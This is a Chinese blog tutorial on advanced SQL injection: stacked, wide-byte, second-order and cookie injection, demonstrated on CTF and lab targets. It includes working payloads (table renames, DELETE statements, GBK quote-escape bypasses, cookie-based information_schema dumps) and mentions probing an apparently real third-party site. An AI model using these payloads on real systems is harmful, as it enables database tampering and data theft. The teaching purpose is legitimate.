<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/dragon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/dragon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/dragon_16.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sql注入," />










<meta name="description" content="6、堆叠注入mysqli_multi_query() 函数与mysqli_query() 函数mysqli_multi_query() 函数：在php代码中执行多个针对数据库的查询 mysqli_query() 函数：在php代码中执行针对数据库的查询 一般后端php代码中，进行数据库查询的语句都使用的mysqli_query() 函数，但是如果使用了mysqli_multi_query() 函数">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入【进阶】">
<meta property="og:url" content="http://example.com/2021/04/29/SQL%E6%B3%A8%E5%85%A5%E3%80%90%E8%BF%9B%E9%98%B6%E3%80%91/index.html">
<meta property="og:site_name" content="zhe&#39;s blog">
<meta property="og:description" content="6、堆叠注入mysqli_multi_query() 函数与mysqli_query() 函数mysqli_multi_query() 函数：在php代码中执行多个针对数据库的查询 mysqli_query() 函数：在php代码中执行针对数据库的查询 一般后端php代码中，进行数据库查询的语句都使用的mysqli_query() 函数，但是如果使用了mysqli_multi_query() 函数">
<meta property="og:locale">
<meta property="og:image" content="https://i.loli.net/2021/02/26/bB3ckU4rAQ8pMPn.png">
<meta property="og:image" content="https://i.loli.net/2021/02/26/1mZUCXJ8QWhliwG.png">
<meta property="og:image" content="https://i.loli.net/2021/02/26/Ncq1Pf46mO8QTW9.png">
<meta property="og:image" content="https://i.loli.net/2021/01/22/JcxG6KLEb2wteQq.png">
<meta property="og:image" content="https://i.loli.net/2021/01/22/7cXEIrfYgOD8wtl.png">
<meta property="og:image" content="https://i.loli.net/2021/01/22/yi8OK6jeqmElTzt.png">
<meta property="og:image" content="https://i.loli.net/2021/02/26/bRY8QhXeal6gqtH.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/oOy84mcRBUv5NHI.png">
<meta property="og:image" content="https://i.loli.net/2021/04/30/3aEWZxujCSdfn2y.png">
<meta property="og:image" content="https://i.loli.net/2021/04/30/i1cKDAhuQvI9LSj.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/Eo6QUMWFgHqmwZ1.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/hzDUq1eLp79bONf.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/MrHtDXQYAJUCVm4.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/roeI6MZTLR7z452.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/U2Bq8t36OcWf4DX.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/cL4g3HvGuxTCNQX.png">
<meta property="og:image" content="https://i.loli.net/2021/03/01/eaJ571WG9IFQNV2.png">
<meta property="article:published_time" content="2021-04-29T01:51:40.000Z">
<meta property="article:modified_time" content="2021-04-30T14:46:35.996Z">
<meta property="article:author" content="zhe">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/02/26/bB3ckU4rAQ8pMPn.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"right","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/04/29/SQL注入【进阶】/"/>





  <title>SQL注入【进阶】 | zhe's blog</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zhe's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">nice 2 meet u</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/29/SQL%E6%B3%A8%E5%85%A5%E3%80%90%E8%BF%9B%E9%98%B6%E3%80%91/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhe's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入【进阶】</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-04-29T09:51:40+08:00">
                2021-04-29
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" itemprop="url" rel="index">
                    <span itemprop="name">基础知识</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="6、堆叠注入"><a href="#6、堆叠注入" class="headerlink" title="6、堆叠注入"></a>6、堆叠注入</h2><h3 id="mysqli-multi-query-函数与mysqli-query-函数"><a href="#mysqli-multi-query-函数与mysqli-query-函数" class="headerlink" title="mysqli_multi_query() 函数与mysqli_query() 函数"></a>mysqli_multi_query() 函数与mysqli_query() 函数</h3><p><code>mysqli_multi_query() </code>函数：在php代码中执行多个针对数据库的查询</p>
<p><code>mysqli_query()</code> 函数：在php代码中执行针对数据库的查询</p>
<p>一般后端php代码中，进行数据库查询的语句都使用的<code>mysqli_query() </code>函数，但是如果使用了<code>mysqli_multi_query() </code>函数，就可以在查询语句之后，执行其他的sql语句，所以可以说堆叠注入的使用条件十分有限，一旦能够被使用，将可能对网站造成十分大的威胁，以下是<strong>buuctf</strong>中一个堆叠注入的例子：</p>
<h3 id="强网杯-2019-随便注"><a href="#强网杯-2019-随便注" class="headerlink" title="[强网杯 2019]随便注"></a>[强网杯 2019]随便注</h3><p>在url中我们可以很容易就找到注入点inject：</p>
<p>于是对注入点进行测试，首先试着进行联合注入：</p>
<p>构造闭合之后输入payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select database()#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/02/26/bB3ckU4rAQ8pMPn.png" alt="image-20210122220214500"></p>
<p>返回结果如上，不难发现select、update等关键语句都被过滤掉，但是show、table、column等并未被过滤，于是可以试着使用堆叠注入：</p>
<p>构造闭合之后输入payload（首先查库名）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;show databases;#</span><br></pre></td></tr></table></figure>

<img src="https://i.loli.net/2021/02/26/1mZUCXJ8QWhliwG.png" alt="image-20210122221127417" style="zoom:67%;" />

<p>如上图所示，可以成功查询出数据库中的所有库名，接下来查询表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;show tables;#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/02/26/Ncq1Pf46mO8QTW9.png" alt="image-20210122221836268"></p>
<p>接下来试着查询两个表中的列名：</p>
<p>对于1919810931114514表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;show columns from &#96;1919810931114514&#96;;#</span><br></pre></td></tr></table></figure>

<p>（注意：在windows系统下，反单引号（`）是数据库、表、索引、列和别名用的引用符，当表名为纯数字时，需要用反单引号将表名括起来），得到结果：</p>
<p><img src="https://i.loli.net/2021/01/22/JcxG6KLEb2wteQq.png" alt="image-20210122223058514"></p>
<p>发现flag在这个表中，我们接着查询words表中的列名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;show columns from words;#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/22/7cXEIrfYgOD8wtl.png" alt="image-20210122223310965"></p>
<p>发现words表只有两列，此时可以进行猜测，查询语句便是在这个表中查询数据的，所以我们此时便可以进行猜测，主查询语句为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select id, data from words where id &#x3D; &#39;xx&#39;;</span><br></pre></td></tr></table></figure>

<p>我们既然不能在主查询语句后面做手脚，但是可以纯粹用主查询语句进行flag的查询，即，将表1919810931114514改名成words，然后将words改成别的名字，又把列名flag改为id，狸猫换太子，然后主查询语句表面上是查询words表中的id与data，实际上查到了1919810931114514表中的flag：</p>
<p>使用堆叠注入进行表名和列名的修改：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;rename table words to words1;rename table &#96;1919810931114514&#96; to words;alter table words change flag data varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;#</span><br></pre></td></tr></table></figure>

<p>这时候我们再查询表名与列名发现已经修改完毕，再回到主查询语句之中用万能钥匙进行遍历：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; or 1&#x3D;1#</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/22/yi8OK6jeqmElTzt.png" alt="image-20210122224913789"></p>
<p>补充：查询列名和表名除了使用show语句，还可以使用desc语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">desc &#96;1919810931114514&#96;;#</span><br></pre></td></tr></table></figure>

<p><strong>以上使用了堆叠注入，其原理为：</strong></p>
<p><strong>在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在分号（;）结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。</strong><br> <strong>用户输入：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1; DELETE FROM products</span><br></pre></td></tr></table></figure>


<p> <strong>服务器端生成的sql语句为：（因未对输入的参数进行过滤）</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Select * from products where productid&#x3D;1;DELETE FROM products</span><br></pre></td></tr></table></figure>


<p> <strong>当执行查询后，第一条显示查询信息，第二条则将整个表进行删除</strong></p>
<h2 id="7、宽字节注入"><a href="#7、宽字节注入" class="headerlink" title="7、宽字节注入"></a>7、宽字节注入</h2><h3 id="mysql中一些用于转义的函数"><a href="#mysql中一些用于转义的函数" class="headerlink" title="mysql中一些用于转义的函数"></a>mysql中一些用于转义的函数</h3><p>在mysql中，有一些函数，比如<code>addslashes</code>，<code>mysql_real_escape_string</code>，<code>mysql_escape_string</code>等，会将字符串中的标志性字符，比如单引号<code>&#39;</code>，双引号<code>&quot;</code>等进行转义，即在其前面加上一个反斜杠<code>\</code>来让其含义变为纯粹的字符，如果后端使用这些函数进行了一个过滤，我们在sql注入语句中的引号等字符便无法发挥其应发挥的作用，如何绕过这样的过滤？可以采用宽字节注入的方式</p>
<h3 id="有关宽字节"><a href="#有关宽字节" class="headerlink" title="有关宽字节"></a>有关宽字节</h3><p><strong>字符、字符集</strong><br>字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(encoding)来确定这个字符在该字符集中的位置。</p>
<p><strong>UTF8</strong><br>由于ASCII表示的字符只有128个，因此网络世界的规范是使用UNICODE编码，但是用ASCII表示的字符使用UNICODE并不高效。因此出现了中间格式字符集，被称为通用转换格式，及UTF(Universal Transformation Format)。</p>
<p><strong>宽字节</strong><br>GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。</p>
<p>PHP中编码为GBK，函数执行添加的是ASCII编码（添加的符号为“\”），MYSQL默认字符集是GBK等宽字节字符集，以下是一个利用该漏洞绕过转义函数的例子：</p>
<p>当字符串<code>%df&#39;</code>被转义函数进行转义时，会变为<code>%df\&#39;</code>，其十六进制格式为：<code>%df%5c%27</code>此时，如果程序默认使用的是GBK字符集，比如MySQL，就将会把前面两个十六进制数当作是一个宽字节编码，即汉字<code>縗</code>，所以这时候在后台便是<code>縗&#39;</code>，此时单引号未被转义，成功绕过了该过滤</p>
<h3 id="宽字节注入的实例"><a href="#宽字节注入的实例" class="headerlink" title="宽字节注入的实例"></a>宽字节注入的实例</h3><p>在pikachu靶场中的宽字节注入模块，我们发现用万能钥匙无法将数据库中的内容爆出来，我们此时考虑使用宽字节注入，抓包之后，在name处提交payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%df&#39; or 1&#x3D;1 #</span><br></pre></td></tr></table></figure>

<p>顺利地得到了预期的内容：</p>
<img src="https://i.loli.net/2021/02/26/bRY8QhXeal6gqtH.png" alt="image-20210226000350800" style="zoom:33%;" />

<p>同样的将payload换为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%df&#39; union select database(),2 #</span><br></pre></td></tr></table></figure>

<p>成功获得库名，将select语句换为其他语句，便可以按照sql注入的一般流程进行一步步地注入</p>
<h2 id="8、二次注入"><a href="#8、二次注入" class="headerlink" title="8、二次注入"></a>8、二次注入</h2><p>二次注入的诱发因素也是因为一些转义函数，在我们输入带有如单引号<code>&#39;</code>的字符串时，将这些符号转义，在第一次插入SQL语句的时候，无法构成闭合，但是这一字符串在储存进数据库时，并不会将转义符反斜杠<code>\</code>一起储存进去，所以此时在数据库中储存着的字符串是一个脏字符串，当我们第二次调用这个字符串时，就可以对数据库进行攻击，以下是一个二次注入的实例：</p>
<img src="https://i.loli.net/2021/03/01/oOy84mcRBUv5NHI.png" alt="image-20210301192452726" style="zoom: 33%;" />

<p>这是靶场sqli-labs中的第24关，借助数据库管理工具我们可以事先看到数据表：</p>
<img src="https://i.loli.net/2021/04/30/3aEWZxujCSdfn2y.png" alt="image-20210301193225915" style="zoom: 80%;" />

<p>其中用户Dummy的密码为p@ssword，这时候我们进入创建用户页面，提交payload如下图所示：</p>
<img src="https://i.loli.net/2021/04/30/i1cKDAhuQvI9LSj.png" alt="image-20210301193505011" style="zoom:80%;" />

<p>此时我们发现名为<code>Dummy&#39;#</code>的用户名已经被插入数据库：</p>
<p><img src="https://i.loli.net/2021/03/01/Eo6QUMWFgHqmwZ1.png" alt="image-20210301193619658"></p>
<p>其中的单引号在第一次连接如sql语句时并没有构成闭合，应该是经过了转义函数的转义，但是转义字符并没有跟随着插入数据库中，此时我们尝试二次调用这个用户：</p>
<p><img src="https://i.loli.net/2021/03/01/hzDUq1eLp79bONf.png" alt="image-20210301193829411"></p>
<p>然后我们再次查看后台数据库，发现<code>Dummy&#39;#</code>的密码并没有被修改，反而Dummy的密码被修改了，这样攻击者就达到了攻击数据库并且对其中的用户信息进行恶意篡改的目的</p>
<p><img src="https://i.loli.net/2021/03/01/MrHtDXQYAJUCVm4.png" alt="image-20210301193918611"></p>
<h2 id="9、cookie注入"><a href="#9、cookie注入" class="headerlink" title="9、cookie注入"></a>9、cookie注入</h2><p>首先介绍cookie的定义：</p>
<p><strong>Cookie，有时也用其复数形式 Cookies。类型为“小型文本文件”，是某些网站为了辨别用户身份，进行Session跟踪而储存在用户本地终端上的数据（通常经过加密），由用户客户端计算机暂时或永久保存的信息</strong></p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>在ASP中，request对象获取客户端提交数据常用的是get和post两种方式，同时request对象可以不通过集合来获得数据,即直接使用”request(“name”)”。但它效率低下，容易出错，当我们省略具体的集合名称时，asp是按<code>QueryString(get)</code>、<code>Form(post)</code>、<code>Cookie</code>、<code>Severvariable</code>、集合的顺序来搜索的。cookie是保存在客户端的一个文本文件，可以进行修改，这样一来，就可以利用Request.cookie方式来提交变量的值，从而进行注入攻击。</p>
<h3 id="注入方式"><a href="#注入方式" class="headerlink" title="注入方式"></a>注入方式</h3><p>首先我们需要找到一个注入点，我们是使用get方式提交的参数，要更改成cookie方式提交，我们首先要访问正常的存在注入点的页面，等页面完全打开之后，我们将IE地址栏清空，然后写上:javascript:alert(document.cookie=”id=”+escape(“x”)); 这里的“id=”便是“注入点中id=x”中的“id=”，“escape(“x”)”中的“x”是“id=x”中的“x”了，这两处要根据实际情况来定义。写完之后按下回车网页中会弹出一个对话框。</p>
<p>更改好了cookie后我们就要试下能不能正常访问了，在另外一个窗口中重新打开那个注入点既是将“id=x”去掉后的，然后看是否能正常访问。</p>
<p>如果去掉之后能够继续访问 那么说明可以进行cookie注入，这样就说明程序在使用request对象获取数据的时候并未指明具体使用什么方法来获取，而是直接使用request(“xx”)的方式。cookie形成的一个重要因素已经明确了，接下来我们测试下能否提交特殊字符，看程序是否对数据进行过滤。比如著名的单引号测试法，当然也就可以在语句上添加上手工注入的语句，达到绕过拦截的目的</p>
<p><strong>以下是cookie注入的一个实例：</strong></p>
<p>有漏洞的网站的url为：<a target="_blank" rel="noopener" href="http://minlue.com/product_list.asp%EF%BC%8C%E8%BF%9B%E5%85%A5%E7%BD%91%E7%AB%99%EF%BC%8C%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E7%8C%9C%E6%B5%8Bsmallclass%E4%B8%BA%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C">http://minlue.com/product_list.asp，进入网站，我们可以猜测smallclass为注入点，</a></p>
<p><img src="https://i.loli.net/2021/03/01/roeI6MZTLR7z452.png" alt="image-20210301201059745"></p>
<p>当我们尝试对该注入点进行一般注入的时候，发现页面进行了过滤：</p>
<img src="https://i.loli.net/2021/03/01/U2Bq8t36OcWf4DX.png" alt="image-20210301201356949" style="zoom:50%;" />

<p>于是采取cookie注入：</p>
<p>首先将url改为：<code>javascript:alert(document.cookie=&quot;smallclass=&quot;+escape(&quot;147&quot;));</code></p>
<p>发现页面出现弹窗，页面刷新之后网站显示正常，我们进行进一步测试，分别提交payload：</p>
<p><code>javascript:alert(document.cookie=&quot;smallclass=&quot;+escape(&quot;147 and 1=1&quot;));</code></p>
<p><code>javascript:alert(document.cookie=&quot;smallclass=&quot;+escape(&quot;147 and 1=2&quot;));</code></p>
<p>在显示弹窗之后分别刷新页面，发现前者可以正常显示页面，但是后者便无法正常得到回显，此时便可以确定可以进行cookie注入，网站程序是通过request(“id”)方式获取客户端提交的数据，并且在防注入程序中没有对通过request.cookies方式提交的数据进行过滤。</p>
<p>由于无法确定这个网站的安全性，我们在自己的靶场上进行cookie注入的尝试，在靶场sqli-labs中的第20关为cookie注入，如下图所示：</p>
<p>在登陆框中尝试使用用户名admin以及密码123456，登陆成功，于是可以发现注入点为uname：</p>
<p><img src="https://i.loli.net/2021/03/01/cL4g3HvGuxTCNQX.png" alt="image-20210301204335753"></p>
<p>分别提交payload：</p>
<p><code>javascript:alert(document.cookie=&quot;uname=&quot;+escape(&quot;&#39; and 1=1&quot;));</code></p>
<p><code>javascript:alert(document.cookie=&quot;uname=&quot;+escape(&quot;&#39; and 1=2&quot;));</code></p>
<p>刷新后发现页面分别返回正确和错误，然后按照一般注入的流程进行注入：</p>
<p><code>javascript:alert(document.cookie=&quot;uname=&quot;+escape(&quot;&#39; order by 3#&quot;));</code></p>
<p>得以确定主查询语句的查询数量为3</p>
<p><code>javascript:alert(document.cookie=&quot;uname=&quot;+escape(&quot;&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#&quot;));</code></p>
<p>爆出了表名<img src="https://i.loli.net/2021/03/01/eaJ571WG9IFQNV2.png" alt="image-20210301205848390"></p>
<p>（本人最开始测试的时候payload为<code>javascript:alert(document.cookie=&quot;uname=&quot;+escape(&quot;admin&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#&quot;));</code>，但是回显页面中只能爆出admin的用户名、id与密码，后来想可能是因为回显语句所能回显的信息有限，只能回显主查询语句的查询结果，所以将admin改为空，顺利爆出了库名）</p>
<p>接下来的脱库操作便按照基本流程进行即可</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/04/29/htttp%E7%AE%80%E4%BB%8B/" rel="next" title="http简介">
                <i class="fa fa-chevron-left"></i> http简介
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/04/29/PHP%E4%B8%AD%E7%9A%84%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F/" rel="prev" title="PHP中的正则表达式">
                PHP中的正则表达式 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC81MzM3MC8yOTg0NA=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#6%E3%80%81%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-text">6、堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysqli-multi-query-%E5%87%BD%E6%95%B0%E4%B8%8Emysqli-query-%E5%87%BD%E6%95%B0"><span class="nav-text">mysqli_multi_query() 函数与mysqli_query() 函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="nav-text">[强网杯 2019]随便注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7%E3%80%81%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-text">7、宽字节注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E4%B8%AD%E4%B8%80%E4%BA%9B%E7%94%A8%E4%BA%8E%E8%BD%AC%E4%B9%89%E7%9A%84%E5%87%BD%E6%95%B0"><span class="nav-text">mysql中一些用于转义的函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%89%E5%85%B3%E5%AE%BD%E5%AD%97%E8%8A%82"><span class="nav-text">有关宽字节</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E4%BE%8B"><span class="nav-text">宽字节注入的实例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#8%E3%80%81%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-text">8、二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#9%E3%80%81cookie%E6%B3%A8%E5%85%A5"><span class="nav-text">9、cookie注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E6%96%B9%E5%BC%8F"><span class="nav-text">注入方式</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
